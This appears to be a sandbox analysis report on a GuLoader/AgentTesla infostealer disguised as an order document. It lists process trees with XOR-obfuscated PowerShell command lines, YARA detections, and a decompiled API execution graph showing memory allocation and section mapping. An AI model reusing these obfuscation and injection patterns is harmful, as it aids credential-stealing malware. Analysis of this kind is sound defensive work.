                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:115
                                                            Start time:09:35:42
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x30783395 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:116
                                                            Start time:09:35:42
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6fb600000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:117
                                                            Start time:09:35:43
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x30303295 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:118
                                                            Start time:09:35:43
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:119
                                                            Start time:09:35:44
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x2C2A6B85 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:120
                                                            Start time:09:35:44
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:121
                                                            Start time:09:35:44
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x302C22CC -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:122
                                                            Start time:09:35:44
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:123
                                                            Start time:09:35:45
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x20302BCC -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:124
                                                            Start time:09:35:45
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:125
                                                            Start time:09:35:46
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x2E7230FC -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:126
                                                            Start time:09:35:46
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:127
                                                            Start time:09:35:47
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x757367D7 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:128
                                                            Start time:09:35:47
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:129
                                                            Start time:09:35:48
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x3332389F -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:130
                                                            Start time:09:35:48
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:131
                                                            Start time:09:35:48
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x43616EC9 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:132
                                                            Start time:09:35:48
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:133
                                                            Start time:09:35:49
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x57696CC1 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:134
                                                            Start time:09:35:49
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:135
                                                            Start time:09:35:50
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x6F7752D7 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:136
                                                            Start time:09:35:50
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:137
                                                            Start time:09:35:50
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x6F63438D -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:138
                                                            Start time:09:35:51
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:139
                                                            Start time:09:35:51
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x69723385 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:140
                                                            Start time:09:35:51
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:141
                                                            Start time:09:35:52
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x2C692295 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:142
                                                            Start time:09:35:52
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:143
                                                            Start time:09:35:53
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x2C692295 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:144
                                                            Start time:09:35:53
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:145
                                                            Start time:09:35:53
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x2C206B85 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:146
                                                            Start time:09:35:54
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:147
                                                            Start time:09:35:54
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x302C22CC -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:148
                                                            Start time:09:35:54
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:149
                                                            Start time:09:35:55
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x20302BFC -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:150
                                                            Start time:09:35:55
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:151
                                                            Start time:09:36:07
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
                                                            Imagebase:0xb20000
                                                            File size:108664 bytes
                                                            MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000097.00000000.63070891541.0000000000F00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000097.00000002.67444580363.000000001D574000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen

                                                            Target ID:152
                                                            Start time:09:36:07
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:4.9%
                                                              Dynamic/Decrypted Code Coverage:17.2%
                                                              Signature Coverage:26.6%
                                                              Total number of Nodes:1862
                                                              Total number of Limit Nodes:59
                                                              execution_graph 14216 10001000 14219 1000101b 14216->14219 14226 10001516 14219->14226 14221 10001020 14222 10001024 14221->14222 14223 10001027 GlobalAlloc 14221->14223 14224 1000153d 3 API calls 14222->14224 14223->14222 14225 10001019 14224->14225 14228 1000151c 14226->14228 14227 10001522 14227->14221 14228->14227 14229 1000152e GlobalFree 14228->14229 14229->14221 14230 402840 14231 402bbf 18 API calls 14230->14231 14233 40284e 14231->14233 14232 402864 14235 405be2 2 API calls 14232->14235 14233->14232 14234 402bbf 18 API calls 14233->14234 14234->14232 14236 40286a 14235->14236 14258 405c07 GetFileAttributesW CreateFileW 14236->14258 14238 402877 14239 402883 GlobalAlloc 14238->14239 14240 40291a 14238->14240 14241 402911 CloseHandle 14239->14241 14242 40289c 14239->14242 14243 402922 DeleteFileW 14240->14243 14244 402935 14240->14244 14241->14240 14259 403235 SetFilePointer 14242->14259 14243->14244 14246 4028a2 14247 40321f ReadFile 14246->14247 14248 4028ab GlobalAlloc 14247->14248 14249 4028bb 14248->14249 14250 4028ef 14248->14250 14251 403027 32 API calls 14249->14251 14252 405cb9 WriteFile 14250->14252 14255 4028c8 14251->14255 14253 4028fb GlobalFree 14252->14253 14254 403027 32 API calls 14253->14254 14256 40290e 14254->14256 14257 4028e6 GlobalFree 14255->14257 14256->14241 14257->14250 14258->14238 14259->14246 14260 2fa1efb 14262 2fa1758 14260->14262 14267 2fa16d7 14262->14267 14268 2fa1721 14267->14268 14269 2fa16d7 2 API calls 14268->14269 14270 2fa2309 14269->14270 14270->14270 14274 2fa2559 14270->14274 14272 2fa2554 14273 2fa2559 2 API calls 14272->14273 14273->14272 14275 2fada40 14274->14275 14277 2fa9169 14274->14277 14278 2fa2575 14275->14278 14277->14272 14279 2fa2586 14278->14279 14279->14279 14280 2fad80a NtAllocateVirtualMemory 14279->14280 14281 2fa2651 14280->14281 14282 2fad80a NtAllocateVirtualMemory 14281->14282 14283 2fa2666 14282->14283 14291 2fa2679 14283->14291 14298 2fb0a44 14291->14298 14299 2fb0a49 NtMapViewOfSection 14298->14299 15092 404244 lstrlenW 15093 404263 15092->15093 15094 404265 WideCharToMultiByte 15092->15094 15093->15094 15095 2fa60eb 15096 2fa6046 15095->15096 15098 2fa61dd 15096->15098 15099 2fa61e5 15096->15099 15100 2fa61ea 15099->15100 15100->15099 15101 2faef94 NtAllocateVirtualMemory 15100->15101 15104 2fa627f 15100->15104 15102 2faef8f 15101->15102 15103 2faef94 NtAllocateVirtualMemory 15102->15103 15103->15102 15104->15096 15105 401a57 15106 402ba2 18 API calls 15105->15106 15107 401a5d 15106->15107 15108 402ba2 18 API calls 15107->15108 15109 401a05 15108->15109 15110 2fa64e3 15111 2fb11a9 15110->15111 15112 2fa6528 15110->15112 15113 2fb0a44 NtMapViewOfSection 15112->15113 15114 2fa65b0 15113->15114 15115 2fb0a44 NtMapViewOfSection 15114->15115 15116 2fa68ab 15114->15116 15117 2fa6744 15114->15117 15115->15117 15117->15116 15118 2fb0a44 NtMapViewOfSection 15117->15118 15118->15116 15133 401662 15134 402bbf 18 API calls 15133->15134 15135 401668 15134->15135 15136 406375 2 API calls 15135->15136 15137 40166e 15136->15137 13683 401e66 13684 402bbf 18 API calls 13683->13684 13685 401e6c 13684->13685 13686 405191 25 API calls 13685->13686 13687 401e76 13686->13687 13701 405712 CreateProcessW 13687->13701 13690 401edb CloseHandle 13694 40281e 13690->13694 13691 401e8c WaitForSingleObject 13692 401e9e 13691->13692 13693 401eb0 GetExitCodeProcess 13692->13693 13704 406444 13692->13704 13696 401ec2 13693->13696 13697 401ecf 13693->13697 13708 405f79 wsprintfW 13696->13708 13697->13690 13700 401ecd 13697->13700 13700->13690 13702 401e7c 13701->13702 13703 405745 CloseHandle 13701->13703 13702->13690 13702->13691 13702->13694 13703->13702 13705 406461 PeekMessageW 13704->13705 13706 401ea5 WaitForSingleObject 13705->13706 13707 406457 DispatchMessageW 13705->13707 13706->13692 13707->13705 13708->13700 15155 40226e 15156 402275 15155->15156 15159 402288 15155->15159 15157 406054 18 API calls 15156->15157 15158 402282 15157->15158 15158->15159 15160 405777 MessageBoxIndirectW 15158->15160 15160->15159 15161 2fa5cd5 15162 2fa5d18 15161->15162 15163 2fa5d55 15162->15163 15166 2fa313e 15162->15166 15171 2fad495 15163->15171 15165 2fad80a NtAllocateVirtualMemory 15165->15166 15166->15165 15167 2fa5af2 15166->15167 15168 2fae63c NtAllocateVirtualMemory 15167->15168 15170 2fa5b01 15168->15170 15169 2fa5d68 15172 2fad4dc 15171->15172 15174 2fa313e 15171->15174 15172->15169 15173 2fad80a NtAllocateVirtualMemory 15173->15174 15174->15173 15175 2fa5af2 15174->15175 15176 2fae63c NtAllocateVirtualMemory 15175->15176 15177 2fa5b01 15176->15177 15177->15169 13797 401673 13798 402bbf 18 API calls 13797->13798 13799 40167a 13798->13799 13800 402bbf 18 API calls 13799->13800 13801 401683 13800->13801 13802 402bbf 18 API calls 13801->13802 13803 40168c MoveFileW 13802->13803 13804 401698 13803->13804 13805 40169f 13803->13805 13807 401423 25 API calls 13804->13807 13806 406375 2 API calls 13805->13806 13809 4021e1 13805->13809 13808 4016ae 13806->13808 13807->13809 13808->13809 13811 405ed3 MoveFileExW 13808->13811 13812 405ee7 13811->13812 13814 405ef4 13811->13814 13815 405d61 lstrcpyW 13812->13815 13814->13804 13816 405d89 13815->13816 13817 405daf GetShortPathNameW 13815->13817 13842 405c07 GetFileAttributesW CreateFileW 13816->13842 13819 405dc4 13817->13819 13820 405ece 13817->13820 13819->13820 13822 405dcc wsprintfA 13819->13822 13820->13814 13821 405d93 CloseHandle GetShortPathNameW 13821->13820 13823 405da7 13821->13823 13824 406054 18 API calls 13822->13824 13823->13817 13823->13820 13825 405df4 13824->13825 13843 405c07 GetFileAttributesW CreateFileW 13825->13843 13827 405e01 13827->13820 13828 405e10 GetFileSize GlobalAlloc 13827->13828 13829 405e32 13828->13829 13830 405ec7 CloseHandle 13828->13830 13831 405c8a ReadFile 13829->13831 13830->13820 13832 405e3a 13831->13832 13832->13830 13844 405b6c lstrlenA 13832->13844 13835 405e51 lstrcpyA 13838 405e73 13835->13838 13836 405e65 13837 405b6c 4 API calls 13836->13837 13837->13838 13839 405eaa SetFilePointer 13838->13839 13840 405cb9 WriteFile 13839->13840 13841 405ec0 GlobalFree 13840->13841 13841->13830 13842->13821 13843->13827 13845 405bad lstrlenA 13844->13845 13846 405bb5 13845->13846 13847 405b86 lstrcmpiA 13845->13847 13846->13835 13846->13836 13847->13846 13848 405ba4 CharNextA 13847->13848 13848->13845 15185 10002238 15186 10002296 15185->15186 15187 100022cc 15185->15187 15186->15187 15188 100022a8 GlobalAlloc 15186->15188 15188->15186 13979 40327d SetErrorMode GetVersion 13980 4032b1 13979->13980 13981 4032b7 13979->13981 13983 406408 5 API calls 13980->13983 13982 40639c 3 API calls 13981->13982 13984 4032ce 13982->13984 13983->13981 13985 40639c 3 API calls 13984->13985 13986 4032d8 13985->13986 13987 40639c 3 API calls 13986->13987 13988 4032e2 13987->13988 13989 406408 5 API calls 13988->13989 13990 4032e9 13989->13990 13991 406408 5 API calls 13990->13991 13992 4032f0 #17 OleInitialize SHGetFileInfoW 13991->13992 14070 406032 lstrcpynW 13992->14070 13994 40332d GetCommandLineW 14071 406032 lstrcpynW 13994->14071 13996 40333f GetModuleHandleW 13997 403357 13996->13997 13998 405a13 CharNextW 13997->13998 13999 403366 CharNextW 13998->13999 14000 403491 GetTempPathW 13999->14000 14008 40337f 13999->14008 14072 40324c 14000->14072 14002 4034a9 14003 403503 DeleteFileW 14002->14003 14004 4034ad GetWindowsDirectoryW lstrcatW 14002->14004 14082 402dee GetTickCount GetModuleFileNameW 14003->14082 14005 40324c 12 API calls 14004->14005 14009 4034c9 14005->14009 14006 405a13 CharNextW 14006->14008 14008->14006 14015 40347c 14008->14015 14016 40347a 14008->14016 14009->14003 14010 4034cd GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 14009->14010 14014 40324c 12 API calls 14010->14014 14011 403517 14012 4035ca 14011->14012 14017 4035ba 14011->14017 14021 405a13 CharNextW 14011->14021 14169 4037a1 14012->14169 14019 4034fb 14014->14019 14166 406032 lstrcpynW 14015->14166 14016->14000 14110 40387b 14017->14110 14019->14003 14019->14012 14034 403536 14021->14034 14023 403705 14026 403789 ExitProcess 14023->14026 14027 40370d GetCurrentProcess OpenProcessToken 14023->14027 14024 4035e5 14025 405777 MessageBoxIndirectW 14024->14025 14029 4035f3 ExitProcess 14025->14029 14032 403725 LookupPrivilegeValueW AdjustTokenPrivileges 14027->14032 14033 403759 14027->14033 14030 403594 14035 405aee 18 API calls 14030->14035 14031 4035fb 14036 4056fa 5 API calls 14031->14036 14032->14033 14037 406408 5 API calls 14033->14037 14034->14030 14034->14031 14038 4035a0 14035->14038 14039 403600 lstrcatW 14036->14039 14040 403760 14037->14040 14038->14012 14167 406032 lstrcpynW 14038->14167 14041 403611 lstrcatW 14039->14041 14042 40361c lstrcatW lstrcmpiW 14039->14042 14043 403775 ExitWindowsEx 14040->14043 14044 403782 14040->14044 14041->14042 14042->14012 14046 403638 14042->14046 14043->14026 14043->14044 14047 40140b 2 API calls 14044->14047 14049 403644 14046->14049 14050 40363d 14046->14050 14047->14026 14048 4035af 14168 406032 lstrcpynW 14048->14168 14053 4056dd 2 API calls 14049->14053 14052 405660 4 API calls 14050->14052 14055 403642 14052->14055 14054 403649 SetCurrentDirectoryW 14053->14054 14056 403664 14054->14056 14057 403659 14054->14057 14055->14054 14177 406032 lstrcpynW 14056->14177 14176 406032 lstrcpynW 14057->14176 14060 406054 18 API calls 14061 4036a3 DeleteFileW 14060->14061 14062 4036b0 CopyFileW 14061->14062 14067 403672 14061->14067 14062->14067 14063 4036f9 14064 405ed3 38 API calls 14063->14064 14064->14012 14065 405ed3 38 API calls 14065->14067 14066 406054 18 API calls 14066->14067 14067->14060 14067->14063 14067->14065 14067->14066 